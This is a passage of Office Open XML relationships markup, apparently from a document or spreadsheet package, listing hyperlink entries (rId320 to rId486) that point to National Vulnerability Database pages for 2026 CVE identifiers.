Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69896" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69911" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70283" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70562" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70565" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70567" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70568" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70573" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70585" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71332" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71333" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71340" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71342" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72963" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73003" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73005" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73022" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77485" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77894" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77899" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77905" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78457" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80093" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82062" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83940" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83999" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85360" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68833" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69415" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69490" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69566" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71329" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71348" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72999" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77892" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78451" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78579" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71339" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78625" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78630" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69469" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78545" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78550" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44766" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62801" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66816" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67369" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67383" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67386" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67389" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67390" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67393" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67633" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67641" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67645" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67648" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68776" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68777" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68778" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68779" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68780" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68781" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68784" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68898" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69267" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69297" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69374" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69409" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69497" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69636" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69781" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69839" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70019" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73029" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76968" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76971" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78453" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82059" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82069" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84391" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69874" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69878" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71338" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77887" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77891" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86590" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78552" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78622" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82056" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82063" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70091" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78620" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68874" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69349" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69372" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69405" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69416" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69507" TargetMode="External" Id="rId417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69552" TargetMode="External" Id="rId418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69569" TargetMode="External" Id="rId419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69572" TargetMode="External" Id="rId420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69591" TargetMode="External" Id="rId421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69637" TargetMode="External" Id="rId422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69679" TargetMode="External" Id="rId423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69723" TargetMode="External" Id="rId424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78629" TargetMode="External" Id="rId425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68830" TargetMode="External" Id="rId426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68831" TargetMode="External" Id="rId427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68851" TargetMode="External" Id="rId428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68873" TargetMode="External" Id="rId429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68886" TargetMode="External" Id="rId430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69286" TargetMode="External" Id="rId431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69288" TargetMode="External" Id="rId432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69294" TargetMode="External" Id="rId433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69315" TargetMode="External" Id="rId434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69318" TargetMode="External" Id="rId435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69343" TargetMode="External" Id="rId436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69344" TargetMode="External" Id="rId437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69351" TargetMode="External" Id="rId438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69369" TargetMode="External" Id="rId439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69390" TargetMode="External" Id="rId440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69406" TargetMode="External" Id="rId441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69457" TargetMode="External" Id="rId442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69504" TargetMode="External" Id="rId443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69527" TargetMode="External" Id="rId444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69609" TargetMode="External" Id="rId445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69616" TargetMode="External" Id="rId446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69627" TargetMode="External" Id="rId447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69808" TargetMode="External" Id="rId448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69862" TargetMode="External" Id="rId449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70145" TargetMode="External" Id="rId450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70290" TargetMode="External" Id="rId451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71341" TargetMode="External" Id="rId452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72966" TargetMode="External" Id="rId453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72980" TargetMode="External" Id="rId454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73004" TargetMode="External" Id="rId455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73008" TargetMode="External" Id="rId456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77488" TargetMode="External" Id="rId457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77491" TargetMode="External" Id="rId458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78454" TargetMode="External" Id="rId459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83501" TargetMode="External" Id="rId460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83991" TargetMode="External" Id="rId461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86673" TargetMode="External" Id="rId462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69402" TargetMode="External" Id="rId463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69417" TargetMode="External" Id="rId464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69690" TargetMode="External" Id="rId465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84385" TargetMode="External" Id="rId466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47680" TargetMode="External" Id="rId467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78446" TargetMode="External" Id="rId468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78631" TargetMode="External" Id="rId469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84386" TargetMode="External" Id="rId470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78635" TargetMode="External" Id="rId471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-22575" TargetMode="External" Id="rId472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68785" TargetMode="External" Id="rId473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78624" TargetMode="External" Id="rId474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69615" TargetMode="External" Id="rId475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78560" TargetMode="External" Id="rId476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68849" TargetMode="External" Id="rId477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69316" TargetMode="External" Id="rId478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69832" TargetMode="External" Id="rId479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69853" TargetMode="External" Id="rId480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69895" TargetMode="External" Id="rId481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69548" TargetMode="External" Id="rId482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76959" TargetMode="External" Id="rId483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78452" TargetMode="External" Id="rId484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78508" TargetMode="External" Id="rId485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73019" TargetMode="External" Id="rId486" /><Relationship 